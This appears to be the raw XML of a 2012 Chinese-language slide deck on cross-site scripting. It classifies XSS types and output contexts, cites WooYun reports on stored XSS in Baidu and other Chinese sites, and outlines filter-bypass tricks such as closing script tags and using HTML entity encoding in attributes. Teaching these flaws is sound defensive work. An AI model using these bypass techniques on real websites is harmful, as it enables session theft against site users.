          <p:cNvPr id="37" name="图片 36" descr="icenter.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect r="55423"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786446" y="4714884"/>
            <a:ext cx="2857520" cy="8001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857488" y="2786058"/>
            <a:ext cx="228601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7" name="Picture 13" descr="http://www.aiimg.com/pic/png/200901/png_576/aiimg_com_576_liulanqi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571744"/>
            <a:ext cx="928694" cy="928694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="矩形 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3571868" y="285749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539860" y="2857496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http://pkav.net</a:t>
            </a:r>
            <a:endParaRPr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928926" y="4643446"/>
          <a:ext cx="2214580" cy="10404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2916"/>
                <a:gridCol w="442916"/>
                <a:gridCol w="442916"/>
                <a:gridCol w="442916"/>
                <a:gridCol w="442916"/>
              </a:tblGrid>
              <a:tr h="346829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</a:tr>
              <a:tr h="346829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</a:tr>
              <a:tr h="346829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519" marR="85519" marT="42760" marB="4276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2910" y="3643314"/>
            <a:ext cx="16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Non-persistent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012" y="5559998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Persistent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046" y="4572008"/>
            <a:ext cx="120674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179666" y="400050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50906" y="3143248"/>
            <a:ext cx="135732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 Filter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250442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8064" y="3071810"/>
            <a:ext cx="1357322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扫描器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5322806" y="4000504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822872" y="3143248"/>
            <a:ext cx="1357322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WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>产品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964" y="257174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但是危害越来越小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8294" y="228599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但是容易被扫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9996" y="257174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但是容易被干掉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00034" y="285728"/>
            <a:ext cx="2520154" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="2520154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285728"/>
              <a:ext cx="216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攻击的现状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94046" y="5572140"/>
            <a:ext cx="120674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57620" y="1071546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广泛存在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109154" y="18573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2822476" y="1571612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037054" y="1500174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572132" y="1428736"/>
            <a:ext cx="1714512" cy="2214578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72132" y="3786190"/>
            <a:ext cx="1714512" cy="2214578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2827931" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="282793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2470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的分类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8596" y="3000372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输出内容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1679555" y="2608257"/>
            <a:ext cx="49847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剪去单角的矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357422" y="2143116"/>
            <a:ext cx="1643074" cy="857256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输出未过滤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43372" y="257174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3570" y="1785926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HTML-Context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3570" y="2357430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JS-Context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3570" y="2928934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86314" y="257174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786314" y="2071678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1678761" y="3321843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剪去单角的矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357422" y="3357562"/>
            <a:ext cx="1643074" cy="85725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输出已过滤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43372" y="39290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43372" y="414338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Dom-Based</a:t>
            </a:r>
          </a:p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43570" y="3857628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43570" y="421481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43570" y="4572008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setTimeout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43570" y="4929198"/>
            <a:ext cx="11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setInterval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43570" y="5274246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document.write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43834" y="192880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根据输出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容所处</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的位置来</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分类。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43834" y="4214818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经常需要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二次过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，但程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>员忽略掉</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了。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3964777" y="496491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09842" y="5631436"/>
            <a:ext cx="22621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会自动发生一些转义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 flipH="1" flipV="1">
            <a:off x="3929058" y="1142984"/>
            <a:ext cx="164307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72132" y="642918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Flash-based XSS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4357694"/>
            <a:ext cx="17491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/HTML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 rot="5400000">
            <a:off x="285720" y="3884522"/>
            <a:ext cx="857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834506" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="483450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477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HTML-Context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 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8596" y="928670"/>
            <a:ext cx="555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wooyun-2010-07831  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>random_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>百度某分站存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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27000" r="6779" b="6999"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500034" y="1643050"/>
            <a:ext cx="6286544" cy="157163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857760"/>
            <a:ext cx="6286544" cy="13335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500438"/>
            <a:ext cx="6286544" cy="10382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057787" y="2285992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恶意代码的输入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2330" y="3929066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恶意代码的输出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72330" y="5643578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恶意代码的执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="下箭头 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643834" y="3071810"/>
            <a:ext cx="428628" cy="50006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643834" y="4857760"/>
            <a:ext cx="428628" cy="5000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57290" y="2428868"/>
            <a:ext cx="221457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&lt;, &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>替换为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 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10800000" flipV="1">
            <a:off x="2857488" y="2072472"/>
            <a:ext cx="429422" cy="284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000496" y="207167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14744" y="2428868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判断存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;, &gt; ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止提交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576422" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4576422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21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JS-Context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38301"/>
            <a:ext cx="6667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928670"/>
            <a:ext cx="490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wooyun-2010-09111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点点网存储型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63117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JS-Context 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的利用方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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4000504"/>
            <a:ext cx="52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&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>闭合当前脚本，然后输入自定义内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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r="1098"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857224" y="4429132"/>
            <a:ext cx="428628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5357826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 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上下文，构造正确的闭合。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 r="2173"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857224" y="5819797"/>
            <a:ext cx="428628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214942" y="442913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过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;,&gt;,/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4942" y="4786322"/>
            <a:ext cx="38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替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;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&lt;/’+’script&gt; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网易邮箱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564357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根据实际情况，进行过滤。通常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>输出是字符串，在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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之间，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’,"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214422"/>
            <a:ext cx="490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wooyun-2010-02321(Clouds) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度贴吧存储型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576422" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4576422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21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JS-Context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4591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2571744"/>
            <a:ext cx="365350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一样，过滤 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14324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而实际上，在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的属性里，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&amp;#NNN;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&amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xNN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也是可以被执行的！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63" y="3643314"/>
            <a:ext cx="58769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5357826"/>
            <a:ext cx="355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环形箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3462366">
            <a:off x="6806401" y="4448955"/>
            <a:ext cx="857256" cy="857256"/>
          </a:xfrm>
          <a:prstGeom prst="circular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396" y="400050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进一步构造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用代码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5929330"/>
            <a:ext cx="29415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还需要将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过滤为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&amp;amp;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4214811" y="6000768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572132" y="285728"/>
          <a:ext cx="333378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892"/>
                <a:gridCol w="16668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&amp;#x22; / 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&amp;#x27;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&amp;#x3C; / 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&amp;#x3E;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> /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&amp;#x5C;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&amp;#x2F;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1977</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>368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toolmao.com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gainover</dc:creator>
  <cp:lastModifiedBy>gainover</cp:lastModifiedBy>
  <cp:revision>155</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-25T05:42:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-07-27T19:17:07Z</dcterms:modified>
</cp:coreProperties>
</file>